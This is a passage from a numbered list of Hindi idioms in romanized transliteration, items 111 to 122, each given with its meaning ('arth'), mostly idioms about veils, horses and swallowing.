111- ghooanghat karana. arth - n karana, stri ka apane chehare ka palle se dhakana.
112- ghooanghat uthana. arth - stri ka kisi ke sammukh parda.
113- ghooant jana. arth - pi jana, chupachap sahan kar lena.
114- ghoom p dana. arth - avesh ya krodh mean akar kisi doosare se batean karane lagana.
115- gher ghar karana. arth - anuchit dabav dalana tatha vivash karana.
116-ghotale me p dana. arth - dhan adi ka aisi sthiti mean hona ki usaki vasooli hone ki sanbhavana kshin ho.
117- gho da uthana. arth - gho de ko tej dau dana.
118- gho da ulaangana. arth - kisi ne gho de par pahale-pahale savari karana.
119- gho da kholana. arth - gho de ka saj kholana.
120-gho da nikalana. arth - gho de ko savari ke yogy banana.
121- gho de par chadhe chale ana. arth - kahian pahuanchate hi vahaan se chalane ki rat lagane lagana.
122- ghol kar pi jana. arth - astitv hi n rahane dena.